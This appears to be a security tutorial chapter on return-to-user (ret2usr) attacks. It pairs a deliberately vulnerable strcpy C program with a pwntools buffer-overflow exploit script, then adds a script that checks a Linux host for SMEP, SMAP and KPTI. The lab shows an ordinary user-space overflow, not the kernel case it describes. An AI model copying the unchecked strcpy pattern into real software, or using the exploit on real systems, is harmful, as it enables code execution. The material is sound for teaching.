strangerRidingCaml
5. Return-to-User (ret2usr) Attacks
Return-to-User (ret2usr) Attacks
Return-to-user (ret2usr) attacks are an exploitation technique in which an attacker overwrites the return address on the stack to redirect the control flow into a function in user space, typically one that lets the attacker gain elevated privileges or execute arbitrary code. In the kernel-exploitation setting this series covers, the point is that kernel-mode execution is steered into memory the attacker controls in user space.
Lab Activity: Return-to-User (ret2usr) Attack
In this lab activity, we'll demonstrate a simple ret2usr attack on a vulnerable C program.
Defender Side Code:
```c
#include <stdio.h>
#include <string.h>

/* 64-byte stack buffer filled with strcpy(), which performs no bounds check:
 * input longer than the buffer overwrites the saved frame pointer and the
 * return address that sit above it on the stack. */
void vulnerable_function(char *input) {
    char buffer[64];
    strcpy(buffer, input);
}

int main(int argc, char **argv) {
    if (argc != 2) {
        printf("Usage: %s \n", argv[0]);
        return 1;
    }
    vulnerable_function(argv[1]);
    return 0;
}
```
To compile the defender side code:
```sh
gcc -o vulnerable_program vulnerable_program.c
```
Exploit Code (Python using pwntools):
```python
from pwn import *

# Address of the user-space function we want to execute (lab-specific value;
# a fixed address like this only holds for a non-PIE binary)
user_function_addr = 0x00400560

# Padding to reach the saved return address: 64-byte buffer + 8-byte saved rbp
padding = b"A" * 72

# Payload: padding followed by the target address as a little-endian 64-bit value.
# argv strings cannot carry embedded NUL bytes, so the trailing zero bytes of the
# packed address are dropped; strcpy()'s own terminator supplies one of them.
payload = padding + p64(user_function_addr).rstrip(b"\x00")

# The vulnerable program reads its input from argv[1], not from stdin, so the
# payload is passed as the command-line argument when the process is started
p = process(["./vulnerable_program", payload])

# Interactive shell
p.interactive()
```
The exploit code builds a payload from padding that reaches the saved return address, followed by the address of the user-space function. It then launches the vulnerable program, delivers the payload, and drops into an interactive session on successful exploitation.
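On a real kernel, the defense against the technique described above is hardware and kernel support that stops kernel-mode execution from touching user-space pages. The following script, added here and not part of the original lab, reports whether SMEP, SMAP and KPTI are present on a Linux x86-64 host by parsing `/proc/cpuinfo` and the Meltdown sysfs status file; the sample texts embedded in it are constructed, and the file paths are the standard Linux ones.

```python
"""Report which mitigations against ret2usr (kernel control flow landing in
user-space memory) are present on a Linux x86-64 host.

SMEP stops the kernel executing user pages, SMAP stops it reading/writing
them, and KPTI keeps most of the kernel unmapped while user code runs.
Parsing works on text so the checks can also run on constructed samples."""
import re

CPUINFO_PATH = "/proc/cpuinfo"
MELTDOWN_PATH = "/sys/devices/system/cpu/vulnerabilities/meltdown"

# Constructed sample in /proc/cpuinfo format: a CPU with SMEP but no SMAP.
SAMPLE_CPUINFO = (
    "processor\t: 0\n"
    "model name\t: Sample CPU (constructed)\n"
    "flags\t\t: fpu vme de pse tsc msr pae mce cx8 nx lm smep\n"
)
SAMPLE_MELTDOWN = "Mitigation: PTI\n"


def cpu_flags(cpuinfo_text):
    """Union of the 'flags' tokens across all processor entries."""
    flags = set()
    for line in cpuinfo_text.splitlines():
        m = re.match(r"^flags\s*:\s*(.*)$", line)
        if m:
            flags.update(m.group(1).split())
    return flags


def ret2usr_mitigations(cpuinfo_text, meltdown_status):
    """Map each mitigation to True/False. A CPU flag means the feature is
    available; the kernel enables it by default unless booted with
    nosmep/nosmap. The meltdown file reads 'Mitigation: PTI' when KPTI is
    active; 'Not affected' or 'Vulnerable' mean it is off."""
    flags = cpu_flags(cpuinfo_text)
    return {"smep": "smep" in flags, "smap": "smap" in flags,
            "kpti": "PTI" in meltdown_status}


def missing(status):
    """Names of the mitigations that are absent, sorted for stable output."""
    return sorted(name for name, on in status.items() if not on)


def read_host_status():
    """Read the live files; fall back to the constructed sample when absent."""
    try:
        with open(CPUINFO_PATH) as f, open(MELTDOWN_PATH) as g:
            return ret2usr_mitigations(f.read(), g.read())
    except OSError:
        return ret2usr_mitigations(SAMPLE_CPUINFO, SAMPLE_MELTDOWN)


if __name__ == "__main__":
    for name, on in read_host_status().items():
        print(f"{name.upper():5s} {'enabled' if on else 'MISSING'}")
```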